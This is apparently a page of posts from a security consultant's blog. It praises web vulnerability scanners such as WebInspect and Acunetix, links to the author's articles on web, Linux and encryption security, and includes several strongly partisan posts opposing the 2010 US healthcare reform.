A couple of neat things about WebInspect

If you're into finding the Web security flaws that matter HP's WebInspect should be on your short list of prospective Web vulnerability scanners. Over the past six months WebInspect has repeatedly found a couple of items that I know I otherwise wouldn't have uncovered or been able to exploit to the extent I did.

The first is SQL injection. WebInspect does a very good job finding the actual flawed inputs but really stands out when it comes to exploiting the vulnerabilities - something that proves highly valuable during security assessments. Recently, I came across an application that had authenticated SQL injection that was only exploitable at one role level - which was, of course, the unexpected one. The following is a screenshot of WebInspect's SQL Injector in action showing it's appropriately named "Data Pump" function.



















You often have to tinker and be persistently patient with SQL Injector to get it to exploit a SQL injection flaw...and it does have its false-positive moments hence the need for detailed manual verification. But man, when it gets rolling, look out.

The second thing about WebInspect is its ability to uncover the usage of HTTP GET requests in an otherwise POST-centric world. As with SQL Injector, some are false positives so you have to manually verify that the finding is indeed a problem. But if you can confirm the issue your efforts will pay off because HTTP GET requests can "get" your users and your business in a real bind...It's a big enough problem and such a common finding that it inspired me to write this article: Why use POST vs. GET to keep applications secure.

I could go on with more good things about WebInspect but I'll save that for another time. Until then, don't forget my firm belief that you almost always get what you pay for when it comes to Web vulnerability scanners...there's just too much at stake not to invest in a good tool such as this.

Read More

Don't forget about XSS *behind* the login prompt

Don't assume that your Web security concerns stop at the login prompt. Here's a new piece I wrote where I talk about cross-site scripting (XSS) and whether or not it matters for logged-in users:

Authenticated XSS - problem or not?

Read More

Got Linux security on your mind?

Here's a new webcast and accompanying podcast I recently recorded for SearchEnterpriseLinux.com where I share some insight and opinions regarding the biggest weaknesses I'm seeing with Linux today...and what you can do about it:

Tightening down Linux security (webcast)

Tightening down Linux security (podcast)

Read More

Windows DirectAccess - VPN killer or not?

Here's a new piece I wrote for SearchEnterpriseDesktop.com on Windows 7's/2008's new DirectAccess app:

Using Windows 7's DirectAccess to enhance the mobile user experience

...it's actually pretty cool and worth checking out.

Read More

Why the rich keep getting richer and the poor keep getting poorer

Contrary to what Senator Max Baucus (Democrat) recently said about the forthcoming healthcare deform that's being forced upon us:
“Too often, much of late, the last couple three years the mal-distribution of income in America is gone up way too much, the wealthy are getting way, way too wealthy, and the middle income class is left behind. Wages have not kept up with increased income of the highest income in America. This legislation will have the effect of addressing that mal-distribution of income in America.”

The rich keep getting richer because they keep doing the things that make them rich. The poor keep getting poorer because they keep doing the things that make them poor. It's basic logic just like the "secret" to losing weight: eat less, exercise more. People just don't get these basics of life. It's why so many people buy into the nonsense the diet companies and politicians "feed" us. This mindset explains why this book and its philosophy make so much sense.

Everything in life is a personal choice. Where we are in life today is the exact sum of all the choices we've made up to this point.

Interestingly, information security is no different - you choose the behavior (i.e. ignoring the problem) you choose the consequence (i.e. security breach).

Read More

I do not like it Uncle Sam

Here's a good one going around the Internet that I just love:

I do not like it Uncle Sam, I do not like it Sam I am. I do not like these dirty crooks, I do not like how they cook books. I do not like when Congress steals, I do not like their secret deals. I do not like this Speaker Nan, I do not like this 'YES WE CAN'! I do not like this kind of hope, I do not like it, nope! Nope! Nope!

Read More

Great tool to check for weak Web passwords

I've always been a fan of Acunetix Web Vulnerability Scanner. It's a lesser-known tool that packs a big punch. One of its most redeeming qualities is its password checking. As I mentioned in this post, Acunetix Web Vulnerability Scanner took what was going to be a basic assessment of an Outlook Web Access system with very few findings up many notches into a true penetration of the system...all thanks to the built-in password checks it does by default.

I've since had other scenarios where it has done the same thing and left me wondering why are other scanners finding these holes!?

The following screenshot shows some of the Acunetix Web Vulnerability Scanner password check policy settings.



















The scanner not only checks for weak Web passwords but also weak FTP, POP3, SMTP, and telnet, and others as well.

I'm still waiting for some good brute-force checks built into these tools (a la Brutus) and - especially - better handling of login forms. If/when this occurs I honestly think we could eliminate a huge chunk of the directly-exploitable Web flaws out there. In fact, I'm really surprised that other scanners aren't doing more in this area.

I'm confident that many - if not most - Web sites/apps that are deemed "secure" are just one weak password away from getting hacked...the weak passwords are there, they're just being overlooked. Unless and until we start seeing better password-cracking capabilities built into all mainstream Web vulnerability scanners this flaw will remain and surface its ugly head in any given system. It's just a matter of time.

Read More

What's the biggest Web vulnerability?

Here's a new piece I wrote called The Top Web Vulnerability We Face. It's something I suspect will be around for a long, long time. I'm curious if you agree?

Read More

Users *have* to start locking their screens when working remotely

To continue on with the message in this previous post about users locking their screens while away from their computers I'm amazed at how naive people are with their computer usage in public places.

I see it practically every time I'm at a coffee shop - someone leaves his/her laptop sitting at the table while he/she goes out to take a phone call, use the restroom, smoke a cigarette, talk with an employee across the store and provides someone with ill-intent enough time to snatch the computer away or, in some cases, sit there and monkey around with the computer.

All it takes is about 60 seconds for someone to hop onto an unsecured computer, access sensitive files stored locally or via the corporate VPN and then delete them or email them out.

Combine this vulnerability with unencrypted hard drives and Microsoft's new always-on mobile intranet connection called DirectAccess and you've got yourself a big problem on your hands.

Read More

Check out my new Web application security ebook

Hot off the press...OK, hot off the computer - I've written an ebook on Web application security threats published by SearchSoftwareQuality.com - a great application development/QA site that's part of the TechTarget family.

Download it and learn more about:

• New Web application security challenges
• Assessing your Web application security
• Beating common Web security attacks
• Hacking your own applications
• Web application security best practices

It's free - just sign up for it at Bitpipe.com.

Read More

Great quote on business and career success

Harold Geneen once said "In business, words are words, explanations are explanations, promises are promises, but only performance is reality."

Reminds me just how cheap talk can be when the marketing machine gets its way - especially with "cloud computing". Look more at the actions of businesses and people and less at the words. There you'll find what they're made of.

Read More

Our power of choice has been stripped

No need for us to think any more. Here's a great excerpt from a WSJ piece that underscores the issue:

"In our world of infinite wants but finite resources, there are only two ways to allocate any good or service: either through prices and the choices of millions of individuals, or through central government planning and political discretion."

You hear me say a lot that those in control of information security have a choice in the matter...and, as Dr. Phil McGraw says, you choose the behavior you choose the consequences. So be it.

But we individuals in our own personal lives here in America are losing our ability to choose. It's our new reality with Obamacare and, I suspect, many many other things to come. The politicians know better than the people...and it's all our fault.

I'm going to miss the days when we were in control of ourselves...when we were free.

You probably think I'm crazy. I really don't believe I am...I just see what has happened since the beginning and understand what all of this government control will lead us to. The decisions made this weekend will change our country deeply forever. Everyone will understand sooner or later.

Read More

Are you destroying your backup media the right way?

Here's a recent podcast I recorded on backup media data destruction...better be sure you're doing it the right way:

Ensuring proper data deletion or destruction of backup media

Read More

A sincere "Thanks!"

Frederic Bastiat once said "When plunder becomes a way of life for a group of men living together in society, they create for themselves in the course of time a legal system that authorizes it and a moral code that justifies it."

In the same spirit, I want to send out a sincere and heartfelt Thanks! to all my fellow Americans who voted for "Hope" and "Change" putting a Marxist-loving community organizer into power that has led to the passing of this healthcare "reform"monstrosity.

Specifically,

• I want to thank all the people who cannot think long term.
• I want to thank all the people who do not take responsibility for their own choices and actions.
  
• I want to thank all the people who vote for a living.
• I want to thank all the people who use the police power of government to mooch off of others who actually work for a living.
• I want to thank all the people who believe that government can solve all their problems.
• I want to thank all the people whose selfish dependence on government takes top priority above all.
• I want to thank all the people for supporting politicians who want to force their ideals upon us for the sole reason of gaining control of us and maintaining their own political power.
  
• I want to thank all the people for supporting politicians who could only pass a bill by manipulating and cheating a well-defined set of rules and procedures.
  
• I want to thank all the people who believe that Socialism and Communism are "other people's problems" - things that America could never evolve into.
• I want to think all the people who voted for George W. Bush and all the other spineless Republicans who have played a big part in where we're at today.

And finally,

• I want to thank all the people whose desire for "Hope" and "Change" have helped diminish the opportunities this country had to offer my kids and my future grandkids and, instead, created a scenario for everyone to work harder with less payoff.
  

I'm just furious at what we've let this country become. The wars that have been fought...the lives that have been lost...the toil our Founding Fathers endured....All of that to end up like this.

Shame on us.

Read More

Email security - using content filtering and incident response to round things out

Here are some recent bits I wrote for SearchWinIT.com and SearchExchange.com to help you flesh out the security of your email environment:

The state of email content filtering - and what you can do

Solidify your Exchange email server incident response plan

Read More

All the reasons you need to NOT buy security products

We've all been subjected to the marketing hype the IT and security product vendors put out daily...Well, if you've been looking for ways to save some money, here's why you should not buy information security products:

9 good reasons not to buy information security products

...the marketing madness will never cease. We just have to grow wise and understand what to buy into and what to ignore.

Read More

New tips on 4 facets of encryption

Been wondering about the latest on mobile/backup/database/email encryption? Well, here are some recent tips I wrote to TechTarget that'll help you get the ball rolling:

Securing SMB laptops

Securing removable media with BitLocker To Go

Secure your data backups with encryption key management best practices

Encryption – the great security control that nobody’s using

The true value of transparent data encryption

Is full email encryption the solution to Exchange security?

Read More

No need to fix the problem, just ban the tool

Here's a great post from my colleague Dave Paradi talking about how a conference is banning presenters from using PowerPoint. It's an embedded systems conference. So they're telling these highly-technical people they can't use PowerPoint to get their messages across!? I suspect the audience will instead be subjected to overhead transparencies and slide rule demonstrations. Sounds like a great show!

This is just like businesses banning thumb drives and instant messaging on their networks. The ignorant powers that be proclaim "This stuff is too risky so we're going to ban it." Instead of fixing the problem at a higher level and putting in the proper controls to minimize such risks they just ban the technologies altogether.

It'll be tough for presenters at this conference to "sneak" PowerPoint into their presentations. But what happens when computer users are told they can't use certain hardware or software? They find a workaround and do it anyway because the problem isn't addressed at the right level. And thus the cycle continues. Amazing stuff.

Read More

Unexpected vulnerabilities in the cloud?

When you look past all the ridiculous hype and craze over "cloud computing" the realities set in. Here's a new piece I wrote for SearchCompliance.com that can help set you straight:

Find unexpected vulnerabilities to ensure cloud compliance

Read More

Twitter stole my Twitter idea

I was recently talking to a client about how we need to start up a company with a Twitter acquisition as our exit strategy that scans for malicious URLs in the tinyurl, bit.ly, etc. links that are posted on Twitter. Twitter beat us to the punch. It's actually pretty difficult to comprehend that it's taken them this long to fix such a big problem. Nice to see some innovation where it's really needed.

Read More

Trouble getting policy buy-in? Make 'em self-executing.

If you're having trouble getting security policies on the radar of management and users - much less getting the real buy-in you need, don't fret - there is a possible solution.

It's an idea I got from Louise Slaughter (good name for a politician) and her attempt to force Obamacare on us. Simply make your policies "self-executing". In other words, you write the policies and include verbiage in each one that makes them take effect without any buy-in, votes, or opinions whatsoever.

Imagine if it were this simple for anyone but politicians to manipulate the system in their favor. Now that would be information security change we could believe in!

Read More